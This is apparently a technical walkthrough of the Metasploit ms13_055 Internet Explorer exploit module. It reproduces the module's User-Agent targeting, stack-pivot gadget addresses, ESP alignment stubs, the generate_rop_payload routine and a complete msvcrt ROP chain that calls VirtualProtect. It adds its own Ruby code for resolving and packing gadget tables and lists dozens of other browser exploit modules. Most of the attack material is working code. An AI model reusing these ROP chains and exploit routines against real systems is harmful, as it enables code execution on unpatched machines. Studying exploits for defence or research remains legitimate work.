ms13_055 metasploit

  def get_payload(t)
    if t['Rop'] == :msvcrt
      print_status("Using msvcrt ROP")
      esp_align = "\x81\xc4\x54\xf2\xff\xff"
      rop_dll = 'msvcrt'
      opts    = {'target'=>'xp'}
    else
      print_status("Using JRE ROP")
      esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
      rop_dll = 'java'
      opts    = {}
    end

  

[email protected] ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 C4 54 F2 FF FF            	add	esp, 0xFFFFF254

  

[email protected] ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF            	sub	esp, 0xFFFFD8F0

  

The assembly instruction that esp_align encodes adjusts esp, the stack pointer, back to where the rest of the payload expects it to be.
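To make the two disassemblies above comparable, here is an added decoder (not part of the module) for the `81 /0 imm32` (add esp) and `81 /5 imm32` (sub esp) encodings; it reads the immediate as a signed 32-bit value, which is why the module's comment can call `sub esp, 0xFFFFD8F0` a `sub esp, -10000`. The two constants are the module's own esp_align strings; the function name is mine.

```ruby
# Added example: decode "81 C4 imm32" (add esp) / "81 EC imm32" (sub esp)
# and return the net signed change applied to ESP.
def esp_delta(bytes)
  unless bytes.bytesize == 6 && bytes.getbyte(0) == 0x81
    raise ArgumentError, 'not a 6-byte 81 /r imm32 ESP adjustment'
  end
  imm = bytes.byteslice(2, 4).unpack1('l<')   # imm32 is little-endian and signed
  case bytes.getbyte(1)
  when 0xC4 then imm      # ModRM C4 = /0 (ADD), r/m = ESP
  when 0xEC then -imm     # ModRM EC = /5 (SUB), r/m = ESP
  else raise ArgumentError, 'ModRM byte is not add/sub esp'
  end
end

# The module's two alignment stubs (copied from get_payload above).
MSVCRT_ALIGN = "\x81\xc4\x54\xf2\xff\xff".b   # add esp, 0xFFFFF254  -> ESP -= 3500
JRE_ALIGN    = "\x81\xEC\xF0\xD8\xFF\xFF".b   # sub esp, 0xFFFFD8F0  -> ESP += 10000
```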


  def get_target(agent)
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.1'
      os_name = 'Windows 7'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        return t
      end
    end

    nil
  end

  

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    t = get_target(agent)

  

When a remote web client sends an HTTP request for the page, get_target reads the User-Agent header to determine the client's operating system and browser version, and then returns the version-specific target data from the preset list below.

      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'IE 8 on Windows XP SP3',
            {
              'Rop'   => :msvcrt,
              'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
              'Align' => 0x77c4d801  # add esp, 0x2c; ret
            }
          ],
          [
            'IE 8 on Windows 7',
            {
              'Rop'   => :jre,
              'Pivot' => 0x7c348b05, # xchg eax, esp; ret
              'Align' => 0x7C3445F8  # add esp, 0x2c; ret
            }
          ]
        ],

  

If the client's system is not among the supported targets, a 404 page is returned instead.


  def get_payload(t)
    if t['Rop'] == :msvcrt
      print_status("Using msvcrt ROP")
      esp_align = "\x81\xc4\x54\xf2\xff\xff"
      rop_dll = 'msvcrt'
      opts    = {'target'=>'xp'}
    else
      print_status("Using JRE ROP")
      esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
      rop_dll = 'java'
      opts    = {}
    end

    p = esp_align + payload.encoded + rand_text_alpha(12000)
    generate_rop_payload(rop_dll, p, opts)
  end

  

generate_rop_payload

  def generate_rop_payload(rop, payload, opts={})
    nop      = opts['nop']      || nil
    badchars = opts['badchars'] || ''
    pivot    = opts['pivot']    || ''
    target   = opts['target']   || ''
    base     = opts['base']     || nil

    rop = select_rop(rop, {'target'=>target, 'base'=>base})
    # Replace the reserved words with actual gadgets
    rop = rop.map {|e|
      if e == :nop
        sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
      elsif e == :junk
        Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
      elsif e == :size
        payload.length
      elsif e == :unsafe_negate_size
        get_unsafe_size(payload.length)
      elsif e == :safe_negate_size
        get_safe_size(payload.length)
      else
        e
      end
    }.pack("V*")

    raise RuntimeError, "No ROP chain generated successfully" if rop.empty?

    return pivot + rop + payload
  end

  

It looks up the predefined [module].xml file under the data directory, expands the reserved words in the gadget list (:nop, :junk, :size and the negated sizes) into concrete DWORDs, and returns pivot + gadgets + payload.

<rop>
        <compatibility>
                <target>WINDOWS XP SP2</target>
                <target>WINDOWS XP SP3</target>
        </compatibility>

        <gadgets base="0x77c10000">
                <gadget offset="0x0002b860">POP EAX # RETN</gadget>
                <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
                <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
                <gadget value="junk">JUNK</gadget>
                <gadget offset="0x0001362c">POP EBX # RETN</gadget>
                <gadget offset="0x0004d9bb">Writable location</gadget>
                <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
                <gadget offset="0x00040d13">POP EDX # RETN</gadget>
                <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
                <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
                <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
                <gadget value="junk">JUNK</gadget>
                <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
                <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
                <gadget offset="0x0002ee15">skip 4 bytes</gadget>
                <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
                <gadget offset="0x0004d9bb">Writable location</gadget>
                <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
                <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
                <gadget offset="0x0002a184">POP ESI # RETN</gadget>
                <gadget offset="0x0001aacc">JMP [EAX]</gadget>
                <gadget offset="0x0002b860">POP EAX # RETN</gadget>
                <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
                <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
                <gadget offset="0x00025459">ptr to 'push esp #  ret'</gadget>
        </gadgets>
</rop>
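The following is an added example, not Metasploit's own code, showing how a gadget table in this XML format turns into the DWORD list that generate_rop_payload packs: offset entries are added to the table's base (or to a rebase value, mirroring the 'base' opt), 0x-literals are taken as-is, and the reserved words are expanded for a given payload length. ROP_XML is a constructed excerpt modelled on the msvcrt.xml above, and safe_negate_size is my simplified stand-in for the framework's get_safe_size.

```ruby
# Added example (not Metasploit's own code): resolve a RopDb-style XML gadget
# table into the little-endian DWORD chain that generate_rop_payload emits.
ROP_XML = <<~XML
  <gadgets base="0x77c10000">
    <gadget offset="0x0002b860">POP EAX # RETN</gadget>
    <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
    <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
    <gadget value="junk">JUNK</gadget>
    <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
  </gadgets>
XML

# Simplified stand-in for the framework's get_safe_size (an assumption, not
# its exact code): two's-complement negate the size, then step down until no
# byte of the encoding is 0x00, since a NUL would truncate the chain string.
def safe_negate_size(size)
  neg = (0x100000000 - size) & 0xffffffff
  neg -= 1 while [neg].pack('V').include?("\x00")
  neg
end

# Parse <gadget> elements into [entry, description] pairs: offset="..." is
# added to the table's base (or to +rebase+, like the 'base' opt above),
# value="0x..." is taken literally, any other value is a reserved word.
def parse_gadgets(xml, rebase: nil)
  base = rebase || xml[/<gadgets base="(0x[0-9a-f]+)"/i, 1].hex
  xml.scan(%r{<gadget (offset|value)="([^"]+)">([^<]*)</gadget>}).map do |kind, val, desc|
    entry = if kind == 'offset' then base + val.hex
            elsif val.start_with?('0x') then val.hex
            else val.to_sym
            end
    [entry, desc]
  end
end

# Expand the reserved words for a payload of +payload_len+ bytes and return
# the absolute DWORDs; pack_chain gives the bytes that end up on the stack.
def resolve_chain(xml, payload_len, rebase: nil, junk: 0x41414141)
  parse_gadgets(xml, rebase: rebase).map do |entry, _desc|
    case entry
    when :junk then junk                      # random filler in the framework
    when :size then payload_len
    when :safe_negate_size then safe_negate_size(payload_len)
    else entry                                # absolute address or literal
    end
  end
end

def pack_chain(dwords); dwords.pack('V*'); end
```

With a 0x401-byte payload the safe_negate_size entry comes out as 0xFFFFFBFF, the value the table's own description names.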

  



Searching the Windows browser exploit modules for the ones that build a ROP chain this way:

[email protected] ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148:    code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130:      p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194:      p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135:    code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77:    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78:    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147:      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153:      code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65:    p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178:    rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207:      rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148:        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150:        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153:      rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126:        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128:        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136:      rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139:      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98:      rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112:      rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219:      rop_payload = generate_rop_payload('msvcrt', code,  {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204:      rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108:    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110:    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248:      rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250:      rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182:      rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137:      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144:      rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519:    generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133:      rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137:      rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128:      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125:    generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120:    generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97:    p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157:      rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174:      rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186:        rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197:        rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108:    rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85:    p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189:        rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193:        rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207:        rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217:        rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270:        rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274:        rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202:      rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398:    return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143:      code = generate_rop_payload('java', payload.encoded)

  

Date: 2024-08-25 19:31:25
